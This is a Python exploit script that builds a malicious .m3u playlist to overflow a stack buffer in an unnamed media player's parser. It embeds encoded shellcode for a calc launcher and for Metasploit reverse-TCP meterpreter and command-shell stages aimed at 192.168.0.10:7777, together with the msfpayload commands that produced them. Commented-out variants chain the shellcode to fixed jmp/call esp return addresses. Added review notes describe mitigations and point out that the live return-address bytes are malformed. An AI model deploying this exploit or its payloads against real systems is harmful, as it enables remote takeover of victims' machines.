from struct import *  # NOTE(review): wildcard import, and nothing from struct (pack/unpack) is used below

# Proof-of-concept file generator for a stack-based buffer overflow in an .m3u playlist
# parser (the target application is not named on this page). It writes one oversized
# line to crash.m3u: fixed padding up to the offset the author records as the saved
# return address, a 4-byte overwrite of EIP, and a marker sled. Most of the file is
# payload data that the live write at the bottom does not reference; each constant is
# annotated below.
#
# Defensive reading: the artefact is the classic shape a fuzzer, AV or EDR flags — a
# playlist whose single line is tens of KB long, ending in a raw non-ASCII address
# and runs of 0xCC/0x90. The root cause is presumably a playlist line copied into a
# fixed-size stack buffer without a length check; bounds-checked copies, stack
# cookies, DEP and ASLR each break one link of this chain.

# Distinguishable marker pattern, presumably used earlier to find which bytes land in
# EIP. Not referenced by the live write.
whereIsEip = b'a1234567890b1234567890c1234567890'

# 144-byte payload (the author's "len 144" matches: 14 bytes on the first ten lines
# plus 4 on the last). Described by its name as a Corelan calc.exe launcher; only the
# commented-out writes below ever used it.
calcCorelan = b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" + \
	b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" + \
	b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" + \
	b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" + \
	b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" + \
	b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" + \
	b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" + \
	b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" + \
	b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" + \
	b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" + \
	b"\x7f\xe8\x7b\xca"

# 317-byte msfencode output (13 bytes on the first 24 lines plus 5 on the last) for the
# reverse_tcp meterpreter stage listed in the author's command line. Unused by the live
# write; kept here as the author left it.
#317 #msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=7777 R | msfencode -b '\x00\xff' -v -c 1 -t python
meterpreter = b"\xda\xd5\xd9\x74\x24\xf4\x5f\x2b\xc9\xba\xd1\x89\x9d"+\
	b"\x27\xb1\x49\x31\x57\x19\x03\x57\x19\x83\xc7\x04\x33"+\
	b"\x7c\x61\xcf\x3a\x7f\x9a\x10\x5c\x09\x7f\x21\x4e\x6d"+\
	b"\x0b\x10\x5e\xe5\x59\x99\x15\xab\x49\x2a\x5b\x64\x7d"+\
	b"\x9b\xd1\x52\xb0\x1c\xd4\x5a\x1e\xde\x77\x27\x5d\x33"+\
	b"\x57\x16\xae\x46\x96\x5f\xd3\xa9\xca\x08\x9f\x18\xfa"+\
	b"\x3d\xdd\xa0\xfb\x91\x69\x98\x83\x94\xae\x6d\x39\x96"+\
	b"\xfe\xde\x36\xd0\xe6\x55\x10\xc1\x17\xb9\x43\x3d\x51"+\
	b"\xb6\xb7\xb5\x60\x1e\x86\x36\x53\x5e\x44\x09\x5b\x53"+\
	b"\x95\x4d\x5c\x8c\xe0\xa5\x9e\x31\xf2\x7d\xdc\xed\x77"+\
	b"\x60\x46\x65\x2f\x40\x76\xaa\xa9\x03\x74\x07\xbe\x4c"+\
	b"\x99\x96\x13\xe7\xa5\x13\x92\x28\x2c\x67\xb0\xec\x74"+\
	b"\x33\xd9\xb5\xd0\x92\xe6\xa6\xbd\x4b\x42\xac\x2c\x9f"+\
	b"\xf4\xef\x38\x6c\xca\x0f\xb9\xfa\x5d\x63\x8b\xa5\xf5"+\
	b"\xeb\xa7\x2e\xd3\xec\xc8\x04\xa3\x63\x37\xa7\xd3\xaa"+\
	b"\xfc\xf3\x83\xc4\xd5\x7b\x48\x15\xd9\xa9\xde\x45\x75"+\
	b"\x02\x9e\x35\x35\xf2\x76\x5c\xba\x2d\x66\x5f\x10\x46"+\
	b"\x0c\xa5\xf3\xa9\x78\xa5\x09\x42\x7a\xa6\x13\xf3\xf3"+\
	b"\x40\x41\xe3\x55\xda\xfe\x9a\xfc\x90\x9f\x63\x2b\xdd"+\
	b"\xa0\xe8\xdf\x21\x6e\x19\xaa\x31\x07\xe9\xe1\x68\x8e"+\
	b"\xf6\xdc\x07\x2f\x63\xda\x81\x78\x1b\xe0\xf4\x4f\x84"+\
	b"\x1b\xd3\xdb\x0d\x89\x9c\xb3\x71\x5d\x1d\x44\x24\x37"+\
	b"\x1d\x2c\x90\x63\x4e\x49\xdf\xbe\xe2\xc2\x4a\x40\x53"+\
	b"\xb6\xdd\x28\x59\xe1\x2a\xf7\xa2\xc4\xaa\xc4\x74\x21"+\
	b"\x29\x3c\xf3\x41\xf1"

# 317-byte msfencode output (same line layout as `meterpreter`) for the reverse_tcp
# command-shell stage in the author's command line. Never referenced anywhere in this
# script, not even by the commented-out writes.
#317 #msfpayload windows/shell/reverse_tcp LHOST=192.168.0.10 LPORT=7777 R | msfencode -b '\x00\xff' -v -c 1 -t python
shell = b"\xdd\xc1\xbb\xd3\xa3\x5c\x27\xd9\x74\x24\xf4\x58\x2b"+\
	b"\xc9\xb1\x49\x31\x58\x19\x03\x58\x19\x83\xc0\x04\x31"+\
	b"\x56\xa0\xcf\x3c\x99\x59\x10\x5e\x13\xbc\x21\x4c\x47"+\
	b"\xb4\x10\x40\x03\x98\x98\x2b\x41\x09\x2a\x59\x4e\x3e"+\
	b"\x9b\xd7\xa8\x71\x1c\xd6\x74\xdd\xde\x79\x09\x1c\x33"+\
	b"\x59\x30\xef\x46\x98\x75\x12\xa8\xc8\x2e\x58\x1b\xfc"+\
	b"\x5b\x1c\xa0\xfd\x8b\x2a\x98\x85\xae\xed\x6d\x3f\xb0"+\
	b"\x3d\xdd\x34\xfa\xa5\x55\x12\xdb\xd4\xba\x41\x27\x9e"+\
	b"\xb7\xb1\xd3\x21\x1e\x88\x1c\x10\x5e\x46\x23\x9c\x53"+\
	b"\x97\x63\x1b\x8c\xe2\x9f\x5f\x31\xf4\x5b\x1d\xed\x71"+\
	b"\x7e\x85\x66\x21\x5a\x37\xaa\xb7\x29\x3b\x07\xbc\x76"+\
	b"\x58\x96\x11\x0d\x64\x13\x94\xc2\xec\x67\xb2\xc6\xb5"+\
	b"\x3c\xdb\x5f\x10\x92\xe4\x80\xfc\x4b\x40\xca\xef\x98"+\
	b"\xf2\x91\x67\x6c\xc8\x29\x78\xfa\x5b\x59\x4a\xa5\xf7"+\
	b"\xf5\xe6\x2e\xd1\x02\x08\x05\xa5\x9d\xf7\xa6\xd5\xb4"+\
	b"\x33\xf2\x85\xae\x92\x7b\x4e\x2f\x1a\xae\xc0\x7f\xb4"+\
	b"\x01\xa0\x2f\x74\xf2\x48\x3a\x7b\x2d\x68\x45\x51\x46"+\
	b"\x02\xbf\x32\xa9\x7a\xbf\xc8\x41\x78\xc0\xd2\xf0\xf5"+\
	b"\x26\x80\xe2\x53\xf0\x3d\x9a\xfe\x8a\xdc\x63\xd5\xf6"+\
	b"\xdf\xe8\xd9\x07\x91\x18\x94\x1b\x46\xe9\xe3\x46\xc1"+\
	b"\xf6\xde\xed\xee\x62\xe4\xa7\xb9\x1a\xe6\x9e\x8e\x84"+\
	b"\x19\xf5\x84\x0d\x8f\xb6\xf2\x71\x5f\x37\x03\x24\x35"+\
	b"\x37\x6b\x90\x6d\x64\x8e\xdf\xb8\x18\x03\x4a\x42\x49"+\
	b"\xf7\xdd\x2a\x77\x2e\x29\xf5\x88\x05\xab\xca\x5e\x60"+\
	b"\x29\x3a\xd5\x80\xf1"

# NOTE(review): the handle is never closed and "wb+" requests read access that is never
# used; a `with open("crash.m3u", "wb") as crash:` block would make the flush explicit
# rather than relying on interpreter shutdown.
crash = open("crash.m3u", "wb+")
#26109 base
junk = b'\xcc' * 26109  # padding up to the saved return address ("26109 base" per the author)
nop = b'\x90' * 8  # 0x90 = x86 NOP; defined but unused by the live write
pause = b'\xCC' * 16  # 0xCC = x86 INT3; named "pause" presumably because it stops the process under a debugger
eip = b'\x93\x43\x91\x7C'  # 4-byte little-endian overwrite value; unused, the live write spells its own inline

# Earlier iterations the author kept commented out. The addresses they use are fixed,
# non-randomised locations that their comments label as "call esp", "pop … ret",
# "jmp esp" and "push esp ret" gadgets — exactly the dependence on static module
# addresses that ASLR is meant to remove.
#crash.write(b"\x90" * 880 + calcCorelan + b'\x90' * 25085 + b'\x48\xF7\x10\x00') # \x48\xf7 <-> + nb nop
#crash.write(b"\x90" * 650 + meterpreter + b'\xcc' * 25085 + b'\x48\xF7\x10\x00') # \x48\xf7 <-> + nb nop
#crash.write(junk + b'\x93\x43\x91\x7C' + b'\x90' * 4 + calcCorelan) # junk 26109 #overwrite EIP with call esp
#crash.write(junk + b'\x93\x43\x91\x7C' + b'\x90' * 12 + meterpreter) # junk 26109 #overwrite EIP with call esp
#crash.write(b'\x90'*156 + calcCorelan + b'\x90' * 25809 + b'\x5F\xDF\x87\x7C' + \
#b'XXXX' + b'\x90' * 8 + b'\x1B\x99\x80\x7C' + b'XXXX' + b'\x5F\xDF\x87\x7C' + b'XXXX' + b'\x90'*4 + b'\xC3\x43\x11\x00')
	#pop eax ret			b'\x1B\x99\x80\x7C'  #pop eax pop ebp ret	b'\x5F\xDF\x87\x7C'  #jmp esp 	b'\xC3\x43\x11\x00'
#crash.write( junk + b'\x39\x10\x9C\x7C' + b'XXXX' + b'\x90' * 8 + calcCorelan) # push esp ret
# Live write: padding, the return-address overwrite, then the INT3 sled; no shellcode
# is included, so this variant only demonstrates control of EIP. The author's comment
# describes the address as a JMP DWORD [SS:ESP] (opcode bytes FF 24 E4).
# NOTE(review): the literal b'\x2F\x92\x84\7C' is 5 bytes long, not 4 — Python reads
# `\7` as an octal escape (byte 0x07) followed by the ASCII letter 'C' (compare the
# `\x7C` spelling used on the `eip` line above). The file therefore does not carry
# the 4-byte value the comment implies.
crash.write(junk + b'\x2F\x92\x84\7C' +  pause) # JMP DWORD SS:ESP FF24E4
print("All OK")  # printed unconditionally; a failed write would have raised before reaching this line